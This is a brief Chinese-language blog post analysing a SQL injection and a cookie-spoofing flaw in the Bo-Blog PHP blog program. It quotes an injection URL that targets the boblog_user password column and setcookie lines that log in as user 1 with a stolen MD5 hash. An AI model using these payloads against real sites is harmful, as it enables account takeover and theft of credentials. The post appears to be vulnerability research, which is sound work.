Bo-Blog BloggerBo-blog 博客程序注入后 COOKIE 欺骗漏洞

    看了 xhming 同学的文章有感而发,立马重新下载 boblog 看一篇,那个注入漏洞形成 xhming 同学已经说明了,此前我找到一个注入漏洞,也和这个差不多,可惜……

    经典对白,看代码。

index.php:

if ($go) @list($job, $itemid)=@explode('_', basename($go));

    原本注入语句为:index.php?go=category_0) union select 1,concat(userpsw) from boblog_user%23

    也就是,经过 explode 处理后,假如数据库为 boblog_user,最终只会成为 boblog。
 
    更何况,存在注入漏洞的:`category` in ({$all_needed_cates})");

    不会因为 # 符号而注释掉后面的东西,只会变成 from boblog_user#)。PS:可能因为这里我不会绕过。

    COOKIES 欺骗漏洞很简单,假如某牛真的注入成功得到 MD5 密码不用去跑 MD5 了,直接:

    setcookie ('userid', '1',);
    setcookie ('userpsw', 'md5密文', );

    既可了……